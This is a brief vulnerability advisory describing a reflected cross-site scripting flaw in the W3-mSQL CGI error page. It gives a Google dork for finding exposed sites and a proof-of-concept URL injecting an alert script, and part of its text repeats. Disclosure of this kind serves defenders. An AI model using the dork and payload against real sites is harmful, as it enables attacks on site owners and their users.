W3-mSQL suffers from a cross site scripting vulnerability that leverages a lack of user input sanitization during redisplay on an error page.
f1ce04b4a14ef3e040e6b00d2f0d55dc526065378ed7b416d171b68d2fcdb539
A reflected xss flaw exists in the w3-msql error page.
google dork : "W3-mSQL Error! - Can't stat script file (/"
Just insert a script from the start of /
like if u get a URL like:-
http://localhost/cgi-bin/w3-msql/journal/ijcd/index.html
and the error page output as :-
W3-mSQL Error! - Can't stat script file (/journal/ijcd/index.html)
u can try this:-
A reflected xss flaw exists in the w3-msql error page.
google dork : "W3-mSQL Error! - Can't stat script file (/"
Just insert a script from the start of /
like if u get a URL like:-
http://localhost/cgi-bin/w3-msql/<script>alert('xss')</script>
to confirm the issue